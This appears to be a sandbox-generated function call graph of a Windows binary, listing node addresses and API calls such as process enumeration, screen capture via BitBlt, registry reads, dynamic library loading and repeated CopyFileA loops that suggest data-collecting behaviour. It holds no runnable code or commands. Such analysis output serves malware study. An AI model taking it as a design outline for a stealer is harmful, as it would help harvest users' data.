58015->58016 58017 140617f 58015->58017 58018 1406160 FindFirstFileExW 58016->58018 58019 140615b 58016->58019 58017->58007 58018->58017 58020 1406177 GetLastError 58018->58020 58019->58017 58019->58018 58020->58017 58022 14060f9 58021->58022 58023 14060fd GetLastError 58021->58023 58022->58007 58023->58022 58024->58010 58030 140621f 58025->58030 58026 1406223 58028 141e288 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 58026->58028 58027 140628c 58027->58026 58032 14064fd ___std_fs_open_handle@16 2 API calls 58027->58032 58031 14064ef 58028->58031 58029 1406270 GetLongPathNameW 58029->58027 58033 1406281 GetLastError 58029->58033 58030->58026 58030->58027 58030->58029 58031->57969 58041 14062ee 58032->58041 58033->58026 58034 1405d9c ___std_fs_copy_file@12 36 API calls 58034->58026 58035 1406422 GetFileInformationByHandle 58036 1406353 GetLastError 58035->58036 58037 1406435 58035->58037 58038 140641b 58036->58038 58037->58038 58039 140647c FindFirstFileExW 58037->58039 58038->58034 58039->58036 58040 14064a2 FindClose 58039->58040 58040->58038 58041->58035 58041->58036 58041->58038 58042->57975 58043->57975 58045 14060a6 GetLastError 58044->58045 58048 13c32ac 58044->58048 58046 14060b8 58045->58046 58045->58048 58047 14061b5 44 API calls 58046->58047 58047->58048 58048->57448 58049 13c290a 58048->58049 58050 13c2916 __EH_prolog2 58049->58050 58055 13c2525 19 API calls numpunct 58050->58055 58052 13c2954 58056 1420ef8 RaiseException 58052->58056 58054 13c2965 58055->58052 58056->58054 58058 13c8351 numpunct 58057->58058 58059 141dc67 numpunct 19 API calls 58058->58059 58060 13c835f 58059->58060 58065 13c774b 58060->58065 58063 141dc67 numpunct 19 API calls 58064 13c83a3 error_info_injector 58063->58064 58064->57453 58066 13c7757 58065->58066 58067 13c778b 58065->58067 58066->58067 58068 13c7771 CreateFileMappingA 58066->58068 58067->58063 58067->58064 58068->58067 58069 13c7792 MapViewOfFile 58068->58069 58069->58067 58070 13c77a8 CloseHandle 58069->58070 58070->58067 58072 13de8dd 58071->58072 58072->58072 58075 13de8f1 58072->58075 58130 13c12de 19 API calls std::exception::exception 58072->58130 58074 13de916 58075->57505 58131 13c3254 58076->58131 58078 13c318c 58079 13c31ad 58078->58079 58135 13c29c2 19 API calls 2 library calls 58078->58135 58079->57507 58083 13c2e75 numpunct 58082->58083 58084 13de75f 47 API calls 58083->58084 58085 13c2e95 58084->58085 58086 13c2e9a 58085->58086 58087 13c290a 19 API calls 58085->58087 58086->57514 58091 13c16cb 58087->58091 58088 13c2b95 21 API calls 58088->58091 58090 13c16f0 58090->57514 58091->58088 58091->58090 58136 13c2839 19 API calls 4 library calls 58091->58136 58093 13c2b2d 44 API calls 58092->58093 58095 13c2a94 58093->58095 58094 13c2aaa 58094->57528 58095->58094 58096 13c290a 19 API calls 58095->58096 58097 13c2ac5 58096->58097 58099 13c2b95 21 API calls 58098->58099 58102 13c16cb 58099->58102 58101 13c16f0 58101->57528 58102->58098 58102->58101 58137 13c2839 19 API calls 4 library calls 58102->58137 58104 13ddf4c 58103->58104 58105 13d6a52 58103->58105 58106 13df6e3 _Deallocate 18 API calls 58104->58106 58105->57230 58106->58105 58107->57528 58109 13de5e3 58108->58109 58138 13de603 58109->58138 58111 13de5f7 58111->57528 58113 13ddf41 18 API calls 58112->58113 58114 13de14f 58113->58114 58114->57528 58116 13de0c6 58115->58116 58117 13de0d8 ctype 58116->58117 58118 13df70f messages 19 API calls 58116->58118 58117->57528 58118->58117 58119->57528 58120->57518 58121->57520 58123 13def51 numpunct 58122->58123 58124 13defbf 58123->58124 58125 13def74 58123->58125 58126 13defd3 58123->58126 58124->57524 58125->58124 58129 13de0ab messages 19 API calls 58125->58129 58147 13df7b8 19 API calls 58126->58147 58129->58125 58130->58074 58132 13c326e 58131->58132 58133 14061b5 44 API calls 58132->58133 58134 13c327e 58133->58134 58134->58078 58136->58091 58137->58102 58139 13de60d numpunct 58138->58139 58140 13de68b 58139->58140 58141 13de643 ___std_fs_convert_wide_to_narrow 58139->58141 58144 13de67a 58139->58144 58146 13c14ec 19 API calls Concurrency::cancel_current_task 58140->58146 58142 13de655 58141->58142 58141->58144 58145 13de668 ___std_fs_convert_wide_to_narrow 58142->58145 58144->58111 58145->58144 58146->58144 58149 1422cca 35 API calls 58148->58149 58150 13c8f2b 58149->58150 58150->57533 58153 13c929e numpunct 58151->58153 58732 13dbb72 58153->58732 58154 13c93db 58155 13ca1c1 58154->58155 58157 13c8f5d 36 API calls 58154->58157 58156 13ddf41 18 API calls 58155->58156 58158 13ca1cc 58156->58158 58159 13c940b 58157->58159 58158->57535 58160 13c8f5d 36 API calls 58159->58160 58161 13c941f 58160->58161 58162 13de8c7 19 API calls 58161->58162 58163 13c943a 58162->58163 58164 13ddf41 18 API calls 58163->58164 58165 13c9489 58164->58165 58166 13ddf41 18 API calls 58165->58166 58167 13c9494 58166->58167 58168 13ddf41 18 API calls 58167->58168 58169 13c949f 58168->58169 58170 13ddf41 18 API calls 58169->58170 58171 13c94aa 58170->58171 58172 13ddf41 18 API calls 58171->58172 58173 13c94b9 58172->58173 58174 13c8f5d 36 API calls 58173->58174 58175 13c94c7 58174->58175 58176 13c8f5d 36 API calls 58175->58176 58177 13c94db 58176->58177 58178 13de8c7 19 API calls 58177->58178 58261 13cc9f6 numpunct 58260->58261 58262 13de0ab messages 19 API calls 58261->58262 58263 13ccad1 58262->58263 59055 13d6592 58263->59055 58265 13cd368 58267 13ddf41 18 API calls 58265->58267 58266 13de0ab messages 19 API calls 58274 13ccadc 58266->58274 58268 13cd388 58267->58268 58268->57535 58269 13de143 18 API calls 58269->58274 58270 13c3174 45 API calls 58270->58274 58271 13c2e70 47 API calls 58271->58274 58272 13de8c7 19 API calls 58272->58274 58273 13ddf41 18 API calls 58273->58274 58274->58265 58274->58266 58274->58269 58274->58270 58274->58271 58274->58272 58274->58273 58275 13c2a7c 45 API calls 58274->58275 58276 13c16cb 21 API calls 58274->58276 58277 13c2ebb 21 API calls 58274->58277 58278 13de5d4 21 API calls 58274->58278 58279 13c83df 44 API calls 58274->58279 58275->58274 58276->58274 58277->58274 58278->58274 58279->58274 58281 13db7cd numpunct 58280->58281 58282 13db9c1 58281->58282 58283 13c8f5d 36 API calls 58281->58283 58282->57535 58284 13db7f8 58283->58284 58285 13c8f5d 36 API calls 58284->58285 58286 13db80c 58285->58286 58287 13de8c7 19 API calls 58286->58287 58288 13db827 58287->58288 58289 13ddf41 18 API calls 58288->58289 58290 13db873 58289->58290 58291 13ddf41 18 API calls 58290->58291 58292 13db87e 58291->58292 58293 13ddf41 18 API calls 58292->58293 58294 13db889 58293->58294 58295 13ddf41 18 API calls 58294->58295 58296 13db894 58295->58296 58297 13ddf41 18 API calls 58296->58297 58298 13db8a3 KiUserCallbackDispatcher GetSystemMetrics GetDC 58297->58298 58299 13db8cf SelectObject BitBlt 58298->58299 59067 13c4619 58299->59067 58302 13db931 EnterCriticalSection LeaveCriticalSection 59072 13c4bcb GetObjectA 58302->59072 58304 13db957 58305 13db96c DeleteDC DeleteObject ReleaseDC 58304->58305 58306 13db997 58305->58306 58307 13c83df 44 API calls 58306->58307 58308 13db9ae 58307->58308 59074 13c46e3 58308->59074 58313 13daa3c numpunct 58312->58313 59085 13da518 58313->59085 58315 13daed2 58315->57535 58316 13daeb0 FreeLibrary 58316->58315 58318 13ddf41 18 API calls 58320 13daa47 58318->58320 58319 13da933 22 API calls 58319->58320 58320->58315 58320->58316 58320->58318 58320->58319 58322 13cd3a1 numpunct 58321->58322 58323 13c8f5d 36 API calls 58322->58323 58324 13cd3c0 58323->58324 58325 13c8f5d 36 API calls 58324->58325 58326 13cd3d3 58325->58326 58327 13de8c7 19 API calls 58326->58327 58328 13cd3ee 58327->58328 58329 13ddf41 18 API calls 58328->58329 58330 13cd43f 58329->58330 58331 13ddf41 18 API calls 58330->58331 58332 13cd447 58331->58332 58333 13ddf41 18 API calls 58332->58333 58334 13cd452 58333->58334 58335 13ddf41 18 API calls 58334->58335 58336 13cd45d 58335->58336 58337 13ddf41 18 API calls 58336->58337 58338 13cd46c 58337->58338 58339 13ddf41 18 API calls 58338->58339 58340 13cd538 58339->58340 58341 13c3174 45 API calls 58340->58341 58342 13cd5d6 58341->58342 58345 13c2e70 47 API calls 58342->58345 58361 13cd807 58342->58361 58343 13ddf41 18 API calls 58344 13cd869 58343->58344 58346 13ddf41 18 API calls 58344->58346 58350 13cd615 58345->58350 58347 13cd874 58346->58347 58348 13ddf41 18 API calls 58347->58348 58349 13cd87c 58348->58349 58349->57535 58351 13cd663 58350->58351 59104 13c16cb 21 API calls 58350->59104 58352 13cd7c5 58351->58352 58359 13cd66d 58351->58359 58354 13cd7d0 58352->58354 59105 13c16cb 21 API calls 58352->59105 58356 13cd7e3 58354->58356 59106 13c16cb 21 API calls 58354->59106 58360 13c3225 47 API calls 58356->58360 58357 13c3225 47 API calls 58357->58359 58359->58351 58359->58357 58362 13de5d4 21 API calls 58359->58362 58365 13c2ebb 21 API calls 58359->58365 58366 13de5d4 21 API calls 58359->58366 58367 13c83df 44 API calls 58359->58367 58368 13ddf41 18 API calls 58359->58368 58360->58361 58361->58343 58363 13cd6b6 CopyFileA 58362->58363 58364 13ddf41 18 API calls 58363->58364 58364->58359 58365->58359 58366->58359 58367->58359 58368->58359 58370 13cd895 numpunct 58369->58370 58371 13c8f5d 36 API calls 58370->58371 58372 13cd8b4 58371->58372 58373 13c8f5d 36 API calls 58372->58373 58374 13cd8c7 58373->58374 58375 13de8c7 19 API calls 58374->58375 58376 13cd8e2 58375->58376 58377 13ddf41 18 API calls 58376->58377 58378 13cd933 58377->58378 58379 13ddf41 18 API calls 58378->58379 58380 13cd93b 58379->58380 58381 13ddf41 18 API calls 58380->58381 58382 13cd946 58381->58382 58383 13ddf41 18 API calls 58382->58383 58384 13cd951 58383->58384 58385 13ddf41 18 API calls 58384->58385 58386 13cd960 58385->58386 58387 13ddf41 18 API calls 58386->58387 58388 13cda3a 58387->58388 58389 13c3174 45 API calls 58388->58389 58390 13cda98 58389->58390 58393 13c2e70 47 API calls 58390->58393 58409 13cdcbd 58390->58409 58391 13ddf41 18 API calls 58392 13cdd1c 58391->58392 58394 13ddf41 18 API calls 58392->58394 58398 13cdad7 58393->58398 58395 13cdd27 58394->58395 58396 13ddf41 18 API calls 58395->58396 58397 13cdd2f 58396->58397 58397->57535 58399 13cdb2b 58398->58399 59107 13c16cb 21 API calls 58398->59107 58401 13cdc81 58399->58401 58407 13cdb35 58399->58407 58402 13cdc8c 58401->58402 59108 13c16cb 21 API calls 58401->59108 58404 13cdc9f 58402->58404 59109 13c16cb 21 API calls 58402->59109 58408 13c3225 47 API calls 58404->58408 58405 13c3225 47 API calls 58405->58407 58407->58399 58407->58405 58410 13de5d4 21 API calls 58407->58410 58413 13c2ebb 21 API calls 58407->58413 58414 13de5d4 21 API calls 58407->58414 58415 13c83df 44 API calls 58407->58415 58416 13ddf41 18 API calls 58407->58416 58408->58409 58409->58391 58411 13cdb7b CopyFileA 58410->58411 58412 13ddf41 18 API calls 58411->58412 58412->58407 58413->58407 58414->58407 58415->58407 58416->58407 58418 13cddca numpunct 58417->58418 58419 13c8f5d 36 API calls 58418->58419 58420 13cdde1 58419->58420 58421 13c8f5d 36 API calls 58420->58421 58422 13cddf6 58421->58422 58423 13de8c7 19 API calls 58422->58423 58424 13cde13 58423->58424 58425 13ddf41 18 API calls 58424->58425 58426 13cde5f 58425->58426 58427 13ddf41 18 API calls 58426->58427 58428 13cde6a 58427->58428 58429 13ddf41 18 API calls 58428->58429 58430 13cde75 58429->58430 58431 13ddf41 18 API calls 58430->58431 58432 13cde80 58431->58432 58433 13ddf41 18 API calls 58432->58433 58436 13cde8c 58433->58436 58434 13dbb72 20 API calls 58435 13ce039 58434->58435 58437 13ddf41 18 API calls 58435->58437 58436->58434 58438 13ce05d 58437->58438 58439 13c3174 45 API calls 58438->58439 58440 13ce088 58439->58440 58441 13ce1c9 58440->58441 58442 13ce0a4 58440->58442 58444 13c3225 47 API calls 58441->58444 58443 13c3225 47 API calls 58442->58443 58445 13ce0c8 58443->58445 58446 13ce1ee 58444->58446 58447 13ce0d7 CopyFileA 58445->58447 58448 13ddf41 18 API calls 58446->58448 58447->58441 58454 13ce104 58447->58454 58449 13ce227 58448->58449 58450 13ddf41 18 API calls 58449->58450 58452 13ce22f 58450->58452 58451 13c83df 44 API calls 58452->57535 58454->58451 58456 13ce248 numpunct 58455->58456 58457 13c8f5d 36 API calls 58456->58457 58458 13ce267 58457->58458 58459 13c8f5d 36 API calls 58458->58459 58460 13ce27a 58459->58460 58461 13de8c7 19 API calls 58460->58461 58462 13ce295 58461->58462 58463 13ddf41 18 API calls 58462->58463 58464 13ce2e6 58463->58464 58465 13ddf41 18 API calls 58464->58465 58466 13ce2ee 58465->58466 58467 13ddf41 18 API calls 58466->58467 58468 13ce2f9 58467->58468 58469 13ddf41 18 API calls 58468->58469 58470 13ce304 58469->58470 58471 13ddf41 18 API calls 58470->58471 58472 13ce313 58471->58472 58473 13ddf41 18 API calls 58472->58473 58474 13ce3e2 58473->58474 58475 13c3174 45 API calls 58474->58475 58476 13ce528 58475->58476 58478 13c2e70 47 API calls 58476->58478 58495 13ce7b5 58476->58495 58477 13ddf41 18 API calls 58479 13ce832 58477->58479 58486 13ce567 58478->58486 58480 13ddf41 18 API calls 58479->58480 58481 13ce83d 58480->58481 58482 13ddf41 18 API calls 58481->58482 58483 13ce848 58482->58483 58484 13ddf41 18 API calls 58483->58484 58497 13ce5b5 58486->58497 59110 13c16cb 21 API calls 58486->59110 58488 13ce773 58489 13ce77e 58488->58489 59111 13c16cb 21 API calls 58488->59111 58491 13ce791 58489->58491 59112 13c16cb 21 API calls 58489->59112 58494 13c3225 47 API calls 58491->58494 58492 13de5d4 21 API calls 58492->58497 58494->58495 58495->58477 58496 13ddf41 18 API calls 58496->58497 58497->58488 58497->58492 58497->58496 58498 13c2ebb 21 API calls 58497->58498 58505 13ce61f 58497->58505 58498->58497 58499 13c3225 47 API calls 58499->58505 58500 13de5d4 21 API calls 58501 13ce665 CopyFileA 58500->58501 58502 13ddf41 18 API calls 58501->58502 58502->58505 58503 13de5d4 21 API calls 58503->58505 58504 13c83df 44 API calls 58504->58505 58505->58497 58505->58499 58505->58500 58505->58503 58505->58504 58506 13ddf41 18 API calls 58505->58506 58506->58505 58508 13ce869 numpunct 58507->58508 58509 13c8f5d 36 API calls 58508->58509 58510 13ce880 58509->58510 58511 13c8f5d 36 API calls 58510->58511 58512 13ce895 58511->58512 58513 13de8c7 19 API calls 58512->58513 58514 13ce8b2 58513->58514 58515 13ddf41 18 API calls 58514->58515 58516 13ce8fe 58515->58516 58517 13ddf41 18 API calls 58516->58517 58518 13ce909 58517->58518 58519 13ddf41 18 API calls 58518->58519 58520 13ce914 58519->58520 58521 13ddf41 18 API calls 58520->58521 58522 13ce91f 58521->58522 58523 13ddf41 18 API calls 58522->58523 58526 13ce92b 58523->58526 58524 13dbb72 20 API calls 58525 13cead0 58524->58525 58527 13ddf41 18 API calls 58525->58527 58526->58524 58528 13ceaf1 58527->58528 58529 13c3174 45 API calls 58528->58529 58530 13ceb19 58529->58530 58531 13cec4a 58530->58531 58532 13ceb35 58530->58532 58534 13c3225 47 API calls 58531->58534 58533 13c3225 47 API calls 58532->58533 58535 13ceb59 58533->58535 58536 13cec6f 58534->58536 58537 13ceb68 CopyFileA 58535->58537 58538 13ddf41 18 API calls 58536->58538 58537->58531 58544 13ceb8f 58537->58544 58539 13cec9f 58538->58539 58540 13ddf41 18 API calls 58539->58540 58541 13c83df 44 API calls 58544->58541 58546 13cecc3 numpunct 58545->58546 58547 13c8f5d 36 API calls 58546->58547 58548 13cece2 58547->58548 58549 13c8f5d 36 API calls 58548->58549 58550 13cecf5 58549->58550 58551 13de8c7 19 API calls 58550->58551 58552 13ced10 58551->58552 58553 13ddf41 18 API calls 58552->58553 58554 13ced61 58553->58554 58555 13ddf41 18 API calls 58554->58555 58556 13ced69 58555->58556 58557 13ddf41 18 API calls 58556->58557 58558 13ced74 58557->58558 58559 13ddf41 18 API calls 58558->58559 58560 13ced7f 58559->58560 58561 13ddf41 18 API calls 58560->58561 58562 13ced8e 58561->58562 58563 13ddf41 18 API calls 58562->58563 58564 13cee4c 58563->58564 58565 13c3174 45 API calls 58564->58565 58566 13cef08 58565->58566 58569 13c2e70 47 API calls 58566->58569 58585 13cf121 58566->58585 58567 13ddf41 18 API calls 58568 13cf180 58567->58568 58570 13ddf41 18 API calls 58568->58570 58574 13cef44 58569->58574 58571 13cf18b 58570->58571 58572 13ddf41 18 API calls 58571->58572 58573 13cf193 58572->58573 58573->57535 58575 13cef92 58574->58575 59113 13c16cb 21 API calls 58574->59113 58577 13cf0e8 58575->58577 58583 13cef9c 58575->58583 58578 13cf0f3 58577->58578 59114 13c16cb 21 API calls 58577->59114 58580 13cf103 58578->58580 59115 13c16cb 21 API calls 58578->59115 58584 13c3225 47 API calls 58580->58584 58581 13c3225 47 API calls 58581->58583 58583->58575 58583->58581 58586 13de5d4 21 API calls 58583->58586 58589 13c2ebb 21 API calls 58583->58589 58590 13de5d4 21 API calls 58583->58590 58591 13c83df 44 API calls 58583->58591 58592 13ddf41 18 API calls 58583->58592 58584->58585 58585->58567 58587 13cefe2 CopyFileA 58586->58587 58588 13ddf41 18 API calls 58587->58588 58588->58583 58589->58583 58590->58583 58591->58583 58592->58583 58594 13cf1ac numpunct 58593->58594 58595 13c8f5d 36 API calls 58594->58595 58596 13cf1cb 58595->58596 58597 13c8f5d 36 API calls 58596->58597 58598 13cf1de 58597->58598 58599 13de8c7 19 API calls 58598->58599 58600 13cf1f9 58599->58600 58601 13ddf41 18 API calls 58600->58601 58602 13cf24a 58601->58602 58603 13ddf41 18 API calls 58602->58603 58604 13cf252 58603->58604 58605 13ddf41 18 API calls 58604->58605 58606 13cf25d 58605->58606 58607 13ddf41 18 API calls 58606->58607 58608 13cf268 58607->58608 58609 13ddf41 18 API calls 58608->58609 58610 13cf277 58609->58610 58611 13ddf41 18 API calls 58610->58611 58612 13cf339 58611->58612 58613 13c3174 45 API calls 58612->58613 58614 13cf3f5 58613->58614 58617 13c2e70 47 API calls 58614->58617 58633 13cf60e 58614->58633 58615 13ddf41 18 API calls 58616 13cf66d 58615->58616 58618 13ddf41 18 API calls 58616->58618 58622 13cf431 58617->58622 58619 13cf678 58618->58619 58620 13ddf41 18 API calls 58619->58620 58621 13cf680 58620->58621 58621->57535 58623 13cf47f 58622->58623 59116 13c16cb 21 API calls 58622->59116 58625 13cf5d5 58623->58625 58631 13cf489 58623->58631 58626 13cf5e0 58625->58626 59117 13c16cb 21 API calls 58625->59117 58628 13cf5f0 58626->58628 59118 13c16cb 21 API calls 58626->59118 58632 13c3225 47 API calls 58628->58632 58629 13c3225 47 API calls 58629->58631 58631->58623 58631->58629 58634 13de5d4 21 API calls 58631->58634 58637 13c2ebb 21 API calls 58631->58637 58638 13de5d4 21 API calls 58631->58638 58639 13c83df 44 API calls 58631->58639 58640 13ddf41 18 API calls 58631->58640 58632->58633 58633->58615 58635 13cf4cf CopyFileA 58634->58635 58636 13ddf41 18 API calls 58635->58636 58636->58631 58637->58631 58638->58631 58639->58631 58640->58631 58642 13cf699 numpunct 58641->58642 58643 13c8f5d 36 API calls 58642->58643 58644 13cf6b0 58643->58644 58645 13c8f5d 36 API calls 58644->58645 58646 13cf6c5 58645->58646 58647 13de8c7 19 API calls 58646->58647 58648 13cf6e2 58647->58648 58649 13ddf41 18 API calls 58648->58649 58650 13cf72e 58649->58650 58651 13ddf41 18 API calls 58650->58651 58652 13cf739 58651->58652 58653 13ddf41 18 API calls 58652->58653 58654 13cf744 58653->58654 58655 13ddf41 18 API calls 58654->58655 58656 13cf74f 58655->58656 58657 13ddf41 18 API calls 58656->58657 58659 13cf75b 58657->58659 58658 13dbb72 20 API calls 58660 13cf90e 58658->58660 58659->58658 58661 13ddf41 18 API calls 58660->58661 58662 13cf932 58661->58662 58663 13c3174 45 API calls 58662->58663 58664 13cf95d 58663->58664 58665 13cf979 58664->58665 58666 13cfa94 58664->58666 58667 13c3225 47 API calls 58665->58667 58668 13c3225 47 API calls 58666->58668 58669 13cf99d 58667->58669 58670 13cfab9 58668->58670 58671 13cf9ac CopyFileA 58669->58671 58672 13ddf41 18 API calls 58670->58672 58671->58666 58678 13cf9d9 58671->58678 58673 13cfaf2 58672->58673 58674 13ddf41 18 API calls 58673->58674 58676 13c83df 44 API calls 58678->58676 58680 13cfb13 numpunct 58679->58680 58681 13c8f5d 36 API calls 58680->58681 58682 13cfb32 58681->58682 58683 13c8f5d 36 API calls 58682->58683 58684 13cfb45 58683->58684 58685 13de8c7 19 API calls 58684->58685 58686 13cfb60 58685->58686 58687 13ddf41 18 API calls 58686->58687 58688 13cfbb1 58687->58688 58689 13ddf41 18 API calls 58688->58689 58690 13cfbb9 58689->58690 58691 13ddf41 18 API calls 58690->58691 58692 13cfbc4 58691->58692 58693 13ddf41 18 API calls 58692->58693 58694 13cfbcf 58693->58694 58695 13ddf41 18 API calls 58694->58695 58696 13cfbde 58695->58696 58697 13ddf41 18 API calls 58696->58697 58698 13cfc96 58697->58698 58699 13c3174 45 API calls 58698->58699 58701 13cfce9 58699->58701 58700 13cff02 58702 13ddf41 18 API calls 58700->58702 58701->58700 58704 13c2e70 47 API calls 58701->58704 58703 13cff61 58702->58703 58705 13ddf41 18 API calls 58703->58705 58709 13cfd25 58704->58709 58706 13cff6c 58705->58706 58707 13ddf41 18 API calls 58706->58707 58708 13cff74 58707->58708 58708->57535 58710 13cfd73 58709->58710 59119 13c16cb 21 API calls 58709->59119 58712 13cfec9 58710->58712 58725 13cfd7d 58710->58725 58713 13cfed4 58712->58713 59120 13c16cb 21 API calls 58712->59120 58715 13cfee4 58713->58715 59121 13c16cb 21 API calls 58713->59121 58718 13c3225 47 API calls 58715->58718 58716 13c3225 47 API calls 58716->58725 58718->58700 58719 13de5d4 21 API calls 58720 13cfdc3 CopyFileA 58719->58720 58721 13ddf41 18 API calls 58720->58721 58721->58725 58722 13c2ebb 21 API calls 58722->58725 58723 13de5d4 21 API calls 58723->58725 58724 13c83df 44 API calls 58724->58725 58725->58710 58725->58716 58725->58719 58725->58722 58725->58723 58725->58724 58726 13ddf41 18 API calls 58725->58726 58726->58725 58728 13dcf35 58727->58728 58729 13dbdbf 58727->58729 58730 13df6e3 _Deallocate 18 API calls 58728->58730 58729->57217 58730->58729 58731->57533 58734 13dbb7c ___std_exception_copy numpunct 58732->58734 58733 13dbbf7 58737 13ddf41 18 API calls 58733->58737 58734->58733 58735 13dbba3 RegOpenKeyExA 58734->58735 58735->58733 58736 13dbbd1 RegGetValueA 58735->58736 58736->58733 58738 13dbc23 58737->58738 58739 13ddf41 18 API calls 58738->58739 58740 13dbc2b 58739->58740 58740->58154 59056 13d659c numpunct 59055->59056 59057 13d65cf CreateToolhelp32Snapshot 59056->59057 59058 13d66f0 59056->59058 59057->59058 59064 13d65f5 59057->59064 59059 13ddf41 18 API calls 59058->59059 59060 13d671a 59059->59060 59060->58274 59061 13ddf41 18 API calls 59061->59064 59062 13d66d7 Process32Next 59062->59058 59062->59064 59064->59061 59064->59062 59065 13ddf41 18 API calls 59064->59065 59066 13dedc4 19 API calls 59064->59066 59065->59062 59066->59064 59068 13c462e 59067->59068 59070 13c4680 59067->59070 59069 13c4644 InitializeCriticalSectionEx 59068->59069 59068->59070 59069->59070 59071 13c4666 GetLastError 59069->59071 59070->58302 59071->59070 59073 13c4bec 59072->59073 59073->58304 59075 13c4717 59074->59075 59076 13c46f0 DeleteObject 59074->59076 59076->59075 59086 13da8b0 59085->59086 59088 13da52e 59085->59088 59086->58320 59087 13da5b2 LoadLibraryA 59087->59086 59091 13da5cd 59087->59091 59088->59087 59089 13da639 GetProcAddress 59094 13da66f 59089->59094 59090 13da6bf GetProcAddress 59093 13da6f2 59090->59093 59091->59089 59092 13da749 GetProcAddress 59095 13da760 59092->59095 59093->59092 59094->59090 59096 13da767 GetProcAddress 59095->59096 59102 13da78d 59096->59102 59097 13da7d0 GetProcAddress 59101 13da804 59097->59101 59098 13da856 GetProcAddress 59099 13da8a4 FreeLibrary 59098->59099 59100 13da871 59098->59100 59099->59086 59100->59099 59103 13da899 59100->59103 59101->59098 59102->59097 59103->59086 59104->58351 59105->58354 59106->58356 59107->58399 59108->58402 59109->58404 59110->58497 59111->58489 59112->58491 59113->58575 59114->58578 59115->58580 59116->58623 59117->58626 59118->58628 59119->58710 59120->58713 59121->58715 59152 14252c7 59122->59152 59124 13d3e9c 59125 1425619 59124->59125 59164 1433676 59125->59164 59127 1425624 59127->57557 59153 14252eb 59152->59153 59154 14252d6 59152->59154 59157 14252e6 __alldvrm 59153->59157 59158 142fda7 59153->59158 59163 1423529 18 API calls _Deallocate 59154->59163 59157->59124 59159 142fa7f __CreateFrameInfo 5 API calls 59158->59159 59160 142fdc3 59159->59160 59161 142fdde GetSystemTimeAsFileTime 59160->59161 59162 142fdcc 59160->59162 59162->59157 59163->59157 59165 14305f2 __CreateFrameInfo 7 API calls 59164->59165 59166 143367e 59165->59166 59167 143369c 59166->59167 59168 143255c std::_Locinfo::_W_Getdays 3 API calls 59166->59168 59167->59127 59169 1433692 59168->59169 59170 1430123 _free 2 API calls 59169->59170 59170->59167 59197 142272a 59196->59197 59198 142273c 59196->59198 59222 141e56b GetModuleHandleW 59197->59222 59208 14225c3 59198->59208 59201 142272f 59201->59198 59223 14227c2 GetModuleHandleExW 59201->59223 59203 141e275 59203->57238 59209 14225cf __wsopen_s 59208->59209 59229 142703f EnterCriticalSection 59209->59229 59211 14225d9 __CreateFrameInfo 59230 1422604 59211->59230 59214 1422780 59234 1430095 GetPEB 59214->59234 59217 14227af 59220 14227c2 __CreateFrameInfo 3 API calls 59217->59220 59218 142278f GetPEB 59218->59217 59219 142279f GetCurrentProcess TerminateProcess 59218->59219 59219->59217 59221 14227b7 ExitProcess 59220->59221 59222->59201 59224 14227e1 GetProcAddress 59223->59224 59225 1422804 59223->59225 59228 14227f6 59224->59228 59226 142273b 59225->59226 59227 142280a FreeLibrary 59225->59227 59226->59198 59227->59226 59228->59225 59229->59211 59233 1427087 LeaveCriticalSection 59230->59233 59232 14225f2 59232->59203 59232->59214 59233->59232 59235 14300af 59234->59235 59236 142278a 59234->59236 59238 142fb02 59235->59238 59236->59217 59236->59218 59239 142fa7f __CreateFrameInfo 5 API calls 59238->59239 59240 142fb1e 59239->59240 59240->59236 59241 140326d 59244 13fe78e 59241->59244 59245 13fe7be 59244->59245 59246 13fe857 59244->59246 59245->59246 59397 13f8241 59245->59397 59248 13fe7e0 ___scrt_fastfail 59248->59246 59404 13fe36e 59248->59404 59251 13fe867 59292 13fea2d 59251->59292 59424 13fcec8 EnterCriticalSection GetCurrentThreadId LeaveCriticalSection HeapFree GetLastError 59251->59424 59252 13e06db 5 API calls 59253 13ff3db 59252->59253 59254 13e06db 5 API calls 59253->59254 59254->59246 59256 13fe8b6 59256->59292 59425 13fe1a1 59256->59425 59257 13fe82b 59257->59246 59423 13e2264 EnterCriticalSection GetCurrentThreadId LeaveCriticalSection HeapFree GetLastError 59257->59423 59260 13fea5c 59261 13feaa5 59260->59261 59432 13fd2d9 6 API calls 59260->59432 59266 13fead6 59261->59266 59434 13ecd8e 59261->59434 59262 13fea21 59262->59260 59262->59292 59431 13f42b1 9 API calls 59262->59431 59265 13fea79 59433 13ecdec 9 API calls 59265->59433 59438 13ece1b 8 API calls 59266->59438 59270 13fe8d4 59270->59262 59273 13fe78e 79 API calls 59270->59273 59270->59292 59271 13feae2 59439 13fe1d3 8 API calls 59271->59439 59273->59270 59274 13feaf3 59275 13feb33 59274->59275 59440 13fd2d9 6 API calls 59274->59440 59278 13febca 59275->59278 59281 13feb50 59275->59281 59277 13feb0e 59279 13ecd8e 8 API calls 59277->59279 59446 13ece1b 8 API calls 59278->59446 59282 13feb22 59279->59282 59442 1401702 79 API calls ___scrt_fastfail 59281->59442 59441 13ed120 9 API calls ctype 59282->59441 59285 13feb8d 59444 13fcef5 9 API calls 59285->59444 59286 13feb65 59286->59285 59286->59292 59443 13ed0e0 5 API calls ___scrt_fastfail 59286->59443 59289 13febb5 59445 1402a3d 8 API calls 59289->59445 59291 13febc1 59291->59292 59474 13fd36a 9 API calls 59291->59474 59292->59252 59294 13fecba 59447 13ece1b 8 API calls 59294->59447 59295 13febd3 ___scrt_fastfail 59295->59292 59295->59294 59300 13ff24e 59295->59300 59297 13fecc3 59448 13ece1b 8 API calls 59297->59448 59299 13ff278 59465 13fe4e8 9 API calls 59299->59465 59300->59299 59464 13f42b1 9 API calls 59300->59464 59301 13fecd0 59449 13ece1b 8 API calls 59301->59449 59305 13ff2b2 59466 1401702 79 API calls ___scrt_fastfail 59305->59466 59307 13fecdd 59450 13fd2d9 6 API calls 59307->59450 59308 13ff2ca 59310 13ff2d5 59308->59310 59311 13ff2e3 59308->59311 59467 13f4789 9 API calls 59310->59467 59468 13fe615 9 API calls 59311->59468 59312 13fecfa 59451 13ecdec 9 API calls 59312->59451 59316 13ff2ee 59318 13ff30f 59316->59318 59322 13ecd8e 8 API calls 59316->59322 59317 13fed19 59319 13ecd8e 8 API calls 59317->59319 59469 1402a3d 8 API calls 59318->59469 59320 13fed63 59319->59320 59323 13ecd8e 8 API calls 59320->59323 59322->59318 59325 13fed78 59323->59325 59324 13ff31b 59470 13fe5c6 9 API calls 59324->59470 59328 13ecd8e 8 API calls 59325->59328 59327 13ff326 59330 13ff341 59327->59330 59471 13f6745 8 API calls 59327->59471 59329 13fed8d 59328->59329 59331 13ecd8e 8 API calls 59329->59331 59472 13fcef5 